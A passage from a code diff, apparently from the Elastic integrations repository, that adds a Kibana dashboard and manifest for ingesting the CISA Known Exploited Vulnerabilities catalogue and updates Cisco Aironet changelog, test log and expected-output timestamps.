+ "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show", + "yLeftExtent": { + "mode": "dataBounds" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "timeRange": { + "from": "now-4y", + "to": "now" + } + }, + "gridData": { + "h": 7, + "i": "11d1dae0-5ff6-45d5-b6b4-94d3e31086ae", + "w": 48, + "x": 0, + "y": 18 + }, + "panelIndex": "11d1dae0-5ff6-45d5-b6b4-94d3e31086ae", + "title": "Vulnerabilities Added Over Time", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a": { + "columnOrder": [ + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819", + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed" + ], + "columns": { + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Vulnerabilities", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "vulnerability.id" + }, + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "linkToLayers": [ + "unifiedHistogram" + ], + "sampling": 1 + }, + "unifiedHistogram": { + "columnOrder": [ + "count_column" + ], + "columns": { + "count_column": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Vulnerabilities", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "vulnerability.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset :\"cisa_kevs.vulnerability\" " + }, + "visualization": { + "color": "#E7664C", + "layerId": "unifiedHistogram", + "layerType": "data", + "metricAccessor": "count_column", + "showBar": false, + "trendlineLayerId": "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "trendlineLayerType": "metricTrendline", + "trendlineMetricAccessor": "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed", + "trendlineTimeAccessor": "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819" + } + }, + "title": "Unique KEVs", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 4, + "i": "994459e2-d2d3-4789-87fe-f417c3d043d4", + "w": 13, + "x": 0, + "y": 0 + }, + "panelIndex": "994459e2-d2d3-4789-87fe-f417c3d043d4", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a": { + "columnOrder": [ + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819", + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed" + ], + "columns": { + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Products", + "operationType": "unique_count", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "cisa_kev.vulnerability.product" + }, + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "linkToLayers": [ + "unifiedHistogram" + ], + "sampling": 1 + }, + "unifiedHistogram": { + "columnOrder": [ + "count_column" + ], + "columns": { + "count_column": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Products", + "operationType": "unique_count", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "cisa_kev.vulnerability.product" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset :\"cisa_kevs.vulnerability\" " + }, + "visualization": { + "color": "#D6BF57", + "layerId": "unifiedHistogram", + "layerType": "data", + "metricAccessor": "count_column", + "showBar": false, + "trendlineLayerId": "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "trendlineLayerType": "metricTrendline", + "trendlineMetricAccessor": "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed", + "trendlineTimeAccessor": "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819" + } + }, + "title": "Unique KEVs", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 4, + "i": "b2191ffc-7417-40bb-893a-732d7ce668b0", + "w": 13, + "x": 13, + "y": 0 + }, + "panelIndex": "b2191ffc-7417-40bb-893a-732d7ce668b0", + "title": "Unique Products", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6e62103f-8ff3-4d24-916f-7a9702eb9f31": { + "columnOrder": [ + "6511ebcf-280b-452d-b2a4-190f2aa65454", + "5e31744c-f016-4138-85a4-720d7de7a0d1", + "f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "15f5b2d8-a528-4420-ba58-8cee1fdfac89", + "9011004c-55e8-4d7c-981a-a282871f9ac1" + ], + "columns": { + "15f5b2d8-a528-4420-ba58-8cee1fdfac89": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Date Added", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "d" + }, + "scale": "interval", + "sourceField": "cisa_kev.vulnerability.date_added" + }, + "5e31744c-f016-4138-85a4-720d7de7a0d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Product", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.product" + }, + "6511ebcf-280b-452d-b2a4-190f2aa65454": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Vendor Project", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.vendor_project" + }, + "9011004c-55e8-4d7c-981a-a282871f9ac1": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "f0f76951-6c0b-4929-b049-12d9e33bbd6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "CVE", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 1000 + }, + "scale": "ordinal", + "sourceField": "vulnerability.id" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\"" + }, + "visualization": { + "columns": [ + { + "columnId": "f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "isTransposed": false, + "width": 147.05555555555554 + }, + { + "columnId": "6511ebcf-280b-452d-b2a4-190f2aa65454", + "isTransposed": false, + "width": 137.55555555555554 + }, + { + "columnId": "5e31744c-f016-4138-85a4-720d7de7a0d1", + "isTransposed": false, + "width": 163.05555555555554 + }, + { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "left", + "columnId": "15f5b2d8-a528-4420-ba58-8cee1fdfac89", + "hidden": false, + "isTransposed": false + } + ], + "layerId": "6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + }, + "rowHeight": "auto", + "sorting": { + "columnId": "15f5b2d8-a528-4420-ba58-8cee1fdfac89", + "direction": "desc" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 18, + "i": "35f41e97-ee29-4ae8-b1f8-da96071026c5", + "w": 22, + "x": 26, + "y": 0 + }, + "panelIndex": "35f41e97-ee29-4ae8-b1f8-da96071026c5", + "title": "Most Recent Vulnerabilities Added to the KEV List", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a3231286-d69b-47b3-9a8c-940078747bbb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a3231286-d69b-47b3-9a8c-940078747bbb": { + "columnOrder": [ + "bad40eca-3d67-4d08-a6a8-21873637f577", + "876576e4-3fec-400a-8f1e-015262b3aea5" + ], + "columns": { + "876576e4-3fec-400a-8f1e-015262b3aea5": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "bad40eca-3d67-4d08-a6a8-21873637f577": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of cisa_kev.vulnerability.vendor_project", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "876576e4-3fec-400a-8f1e-015262b3aea5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.vendor_project" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "emptySizeRatio": 0.54, + "layerId": "a3231286-d69b-47b3-9a8c-940078747bbb", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "876576e4-3fec-400a-8f1e-015262b3aea5" + ], + "nestedLegend": false, + "numberDisplay": "value", + "percentDecimals": 1, + "primaryGroups": [ + "bad40eca-3d67-4d08-a6a8-21873637f577" + ] + } + ], + "palette": { + "name": "default", + "type": "palette" + }, + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "aaae6248-e18f-4e38-ba33-65fd6339ceb5", + "w": 13, + "x": 0, + "y": 4 + }, + "panelIndex": "aaae6248-e18f-4e38-ba33-65fd6339ceb5", + "title": "Top 5 Vendor Projects", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-00d70036-f0e2-4855-bf07-cb4170c30898", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "00d70036-f0e2-4855-bf07-cb4170c30898": { + "columnOrder": [ + "7367379b-5e97-4019-8efa-4b89083ce8b7", + "46fce31b-a82a-4fbd-b147-28a7287ca393" + ], + "columns": { + "46fce31b-a82a-4fbd-b147-28a7287ca393": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "7367379b-5e97-4019-8efa-4b89083ce8b7": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of cisa_kev.vulnerability.product", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "46fce31b-a82a-4fbd-b147-28a7287ca393", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.product" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "emptySizeRatio": 0.54, + "layerId": "00d70036-f0e2-4855-bf07-cb4170c30898", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "46fce31b-a82a-4fbd-b147-28a7287ca393" + ], + "nestedLegend": false, + "numberDisplay": "value", + "primaryGroups": [ + "7367379b-5e97-4019-8efa-4b89083ce8b7" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "b2398a92-2791-44d2-ab6e-62168742b786", + "w": 13, + "x": 13, + "y": 4 + }, + "panelIndex": "b2398a92-2791-44d2-ab6e-62168742b786", + "title": "Top 5 Exploitable Products", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6e62103f-8ff3-4d24-916f-7a9702eb9f31": { + "columnOrder": [ + "6511ebcf-280b-452d-b2a4-190f2aa65454", + "5e31744c-f016-4138-85a4-720d7de7a0d1", + "f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "068fcaff-a6b1-4c7c-8e5f-95acda8cdf17", + "9011004c-55e8-4d7c-981a-a282871f9ac1" + ], + "columns": { + "068fcaff-a6b1-4c7c-8e5f-95acda8cdf17": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Description", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5000 + }, + "scale": "ordinal", + "sourceField": "vulnerability.description" + }, + "5e31744c-f016-4138-85a4-720d7de7a0d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Product", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5000 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.product" + }, + "6511ebcf-280b-452d-b2a4-190f2aa65454": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Vendor Project", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 500 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.vendor_project" + }, + "9011004c-55e8-4d7c-981a-a282871f9ac1": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "f0f76951-6c0b-4929-b049-12d9e33bbd6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "CVE", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5000 + }, + "scale": "ordinal", + "sourceField": "vulnerability.id" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\" " + }, + "visualization": { + "columns": [ + { + "columnId": "f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "isTransposed": false, + "width": 147.05555555555554 + }, + { + "columnId": "6511ebcf-280b-452d-b2a4-190f2aa65454", + "isTransposed": false, + "width": 137.55555555555554 + }, + { + "columnId": "5e31744c-f016-4138-85a4-720d7de7a0d1", + "isTransposed": false, + "width": 163.05555555555554 + }, + { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "hidden": true, + "isTransposed": false + }, + { + "columnId": "068fcaff-a6b1-4c7c-8e5f-95acda8cdf17", + "isTransposed": false + } + ], + "layerId": "6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "16245c6e-c656-4464-8e41-2f2ef485c99d", + "w": 48, + "x": 0, + "y": 25 + }, + "panelIndex": "16245c6e-c656-4464-8e41-2f2ef485c99d", + "title": "Details", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Vulnerability] CISA Known Exploited Vulnerabilities", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-29T03:20:22.877Z", + "id": "cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "11d1dae0-5ff6-45d5-b6b4-94d3e31086ae:indexpattern-datasource-layer-cb06c73a-039f-465e-8e15-bee3c2c1705d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "994459e2-d2d3-4789-87fe-f417c3d043d4:indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "994459e2-d2d3-4789-87fe-f417c3d043d4:indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2191ffc-7417-40bb-893a-732d7ce668b0:indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2191ffc-7417-40bb-893a-732d7ce668b0:indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "35f41e97-ee29-4ae8-b1f8-da96071026c5:indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aaae6248-e18f-4e38-ba33-65fd6339ceb5:indexpattern-datasource-layer-a3231286-d69b-47b3-9a8c-940078747bbb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2398a92-2791-44d2-ab6e-62168742b786:indexpattern-datasource-layer-00d70036-f0e2-4855-bf07-cb4170c30898", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "16245c6e-c656-4464-8e41-2f2ef485c99d:indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/cisa_kevs/manifest.yml b/packages/cisa_kevs/manifest.yml new file mode 100644 index 00000000000..091fcdd819b --- /dev/null +++ b/packages/cisa_kevs/manifest.yml @@ -0,0 +1,40 @@ +format_version: 3.0.3 +name: cisa_kevs +title: "CISA Known Exploited Vulnerabilities" +version: 1.0.0 +description: "This a package that allows the ingest of known exploited vulnerabilities according to the Cybersecurity and Infrastructure Security Agency of the United States of America. This information could be used to enrich or track exisiting vulnerabilities that are known to be exploited in the wild." +type: integration +categories: + - security +conditions: + kibana: + version: "^8.11.4" + elastic: + subscription: "basic" +screenshots: + - src: /img/cisa_kevs.png + title: Dashboard for CISA Known Exploitable Vulnerabilities + size: 600x600 + type: image/png +icons: + - src: "/img/icon.svg" + type: "image/svg+xml" +policy_templates: + - name: cisa_kevs + title: CISA Known Exploited Vulnerabilities + description: Ingest the CISA KEVs with Elastic Agent. + inputs: + - type: httpjson + title: "Collect CISA KEVs via API" + description: "Ingest the CISA KEVs with Elastic Agent." + vars: + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. +owner: + github: elastic/security-service-integrations + type: community diff --git a/packages/cisa_kevs/validation.yml b/packages/cisa_kevs/validation.yml new file mode 100644 index 00000000000..1909b26667a --- /dev/null +++ b/packages/cisa_kevs/validation.yml @@ -0,0 +1,3 @@ +errors: + exclude_checks: + - SVR00002 # expected filter in dashboard. diff --git a/packages/cisco_aironet/changelog.yml b/packages/cisco_aironet/changelog.yml index 5a25f6eedbd..e40ec0d9f9a 100644 --- a/packages/cisco_aironet/changelog.yml +++ b/packages/cisco_aironet/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.13.1" + changes: + - description: Fix CLIENT_ORCH_LOG messages. + type: bugfix + link: https://github.com/elastic/integrations/pull/9545 +- version: "1.13.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.12.2" changes: - description: Changed owners diff --git a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log index 4634c016330..1dbfc5c1acd 100644 --- a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log +++ b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log @@ -28,4 +28,5 @@ <131>WLC001: *radiusTransportThread: Aug 29 10:58:58.000: %AAA-3-INVALID_REQUEST: [PA]radius_db.c:3923 Invalid AAA request. unknown <131>WLC001: *Dot1x_NW_MsgTask_3: Aug 29 10:58:57.787: %DOT1X-3-AAA_AUTH_SEND_FAIL: [PA]1x_aaa.c:893 Unable to send AAA message for client de:fb:48:7c:4f:f7 <132>WLC001: *bcastReceiveTask: Aug 20 14:55:28.577: %BCAST-4-MLD_INVALID_IPV6_PKT: bcastMld.c:2594 Received IPV6 packet which is not a valid MLD packet -<132>WLC001: *apfReceiveTask: Aug 22 10:24:20.959: %APF-4-MOBILESTATION_NOT_FOUND: apf_ms.c:8467 Could not find the mobile cc:73:14:61:b0:8f in internal database \ No newline at end of file +<132>WLC001: *apfReceiveTask: Aug 22 10:24:20.959: %APF-4-MOBILESTATION_NOT_FOUND: apf_ms.c:8467 Could not find the mobile cc:73:14:61:b0:8f in internal database +<190>201477: Jan 4 17:25:42.866: %CLIENT_ORCH_LOG-6-CLIENT_ADDED_TO_RUN_STATE: Chassis 2 R0/0: wncd: Username entry (00-00-00-00-00-00) joined with ssid (System-110) for device with MAC: 0000.0000.0000 \ No newline at end of file diff --git a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json index 0f5d3298dee..52d0098d22a 100644 --- a/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json +++ b/packages/cisco_aironet/data_stream/log/_dev/test/pipeline/test-aironet-messages.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-09-06T23:08:09.371Z", + "@timestamp": "2024-09-06T23:08:09.371Z", "client": { "ip": "169.254.161.111", "mac": "2C-6D-C1-F5-0C-80" @@ -43,7 +43,7 @@ ] }, { - "@timestamp": "2023-09-06T22:42:10.514Z", + "@timestamp": "2024-09-06T22:42:10.514Z", "client": { "ip": "192.168.1.3", "mac": "66-7C-DE-EF-D9-18" @@ -111,7 +111,7 @@ ] }, { - "@timestamp": "2023-09-06T21:53:55.930Z", + "@timestamp": "2024-09-06T21:53:55.930Z", "client": { "mac": "28-6F-7F-F8-64-E0" }, @@ -151,7 +151,7 @@ } }, { - "@timestamp": "2023-09-06T21:46:20.390Z", + "@timestamp": "2024-09-06T21:46:20.390Z", "client": { "mac": "28-6F-7F-F8-64-E0" }, @@ -191,7 +191,7 @@ } }, { - "@timestamp": "2023-08-20T11:26:35.845Z", + "@timestamp": "2024-08-20T11:26:35.845Z", "cisco": { "interface": { "type": "wired" @@ -233,7 +233,7 @@ ] }, { - "@timestamp": "2023-08-20T11:25:50.157Z", + "@timestamp": "2024-08-20T11:25:50.157Z", "cisco": { "interface": { "type": "wired" @@ -275,7 +275,7 @@ ] }, { - "@timestamp": "2023-08-22T16:55:06.121Z", + "@timestamp": "2024-08-22T16:55:06.121Z", "cisco": { "interface": { "type": "wireless" @@ -318,7 +318,7 @@ ] }, { - "@timestamp": "2023-09-06T23:29:50.900Z", + "@timestamp": "2024-09-06T23:29:50.900Z", "client": { "mac": "E8-96-06-02-02-99" }, @@ -358,7 +358,7 @@ } }, { - "@timestamp": "2023-08-22T07:10:46.332Z", + "@timestamp": "2024-08-22T07:10:46.332Z", "cisco": { "interface": { "type": "wireless" @@ -400,7 +400,7 @@ ] }, { - "@timestamp": "2023-08-22T18:11:40.438Z", + "@timestamp": "2024-08-22T18:11:40.438Z", "client": { "as": { "number": 29518, @@ -458,7 +458,7 @@ } }, { - "@timestamp": "2023-08-22T18:14:03.172Z", + "@timestamp": "2024-08-22T18:14:03.172Z", "ecs": { "version": "8.11.0" }, @@ -499,7 +499,7 @@ ] }, { - "@timestamp": "2023-08-22T18:14:24.672Z", + "@timestamp": "2024-08-22T18:14:24.672Z", "cisco": { "wps": { "channel": 6, @@ -544,7 +544,7 @@ ] }, { - "@timestamp": "2023-08-22T18:14:24.672Z", + "@timestamp": "2024-08-22T18:14:24.672Z", "client": { "mac": "4A-B8-CB-63-1D-BD" }, @@ -582,7 +582,7 @@ ] }, { - "@timestamp": "2023-08-22T17:54:24.269Z", + "@timestamp": "2024-08-22T17:54:24.269Z", "destination": { "mac": "28-6F-7F-F8-64-E0" }, @@ -629,7 +629,7 @@ } }, { - "@timestamp": "2023-08-21T22:15:34.710Z", + "@timestamp": "2024-08-21T22:15:34.710Z", "client": { "mac": "80-7D-3A-9B-2F-FC" }, @@ -666,7 +666,7 @@ ] }, { - "@timestamp": "2023-08-21T20:12:58.040Z", + "@timestamp": "2024-08-21T20:12:58.040Z", "client": { "mac": "CC-73-14-61-B0-8F" }, @@ -703,7 +703,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:28.227Z", + "@timestamp": "2024-08-29T10:58:28.227Z", "ecs": { "version": "8.11.0" }, @@ -738,7 +738,7 @@ ] }, { - "@timestamp": "2023-08-29T10:46:48.939Z", + "@timestamp": "2024-08-29T10:46:48.939Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -776,7 +776,7 @@ ] }, { - "@timestamp": "2023-08-29T10:55:30.862Z", + "@timestamp": "2024-08-29T10:55:30.862Z", "cisco": { "eapol": { "descriptor": 2, @@ -820,7 +820,7 @@ ] }, { - "@timestamp": "2023-08-29T10:55:30.850Z", + "@timestamp": "2024-08-29T10:55:30.850Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -857,7 +857,7 @@ ] }, { - "@timestamp": 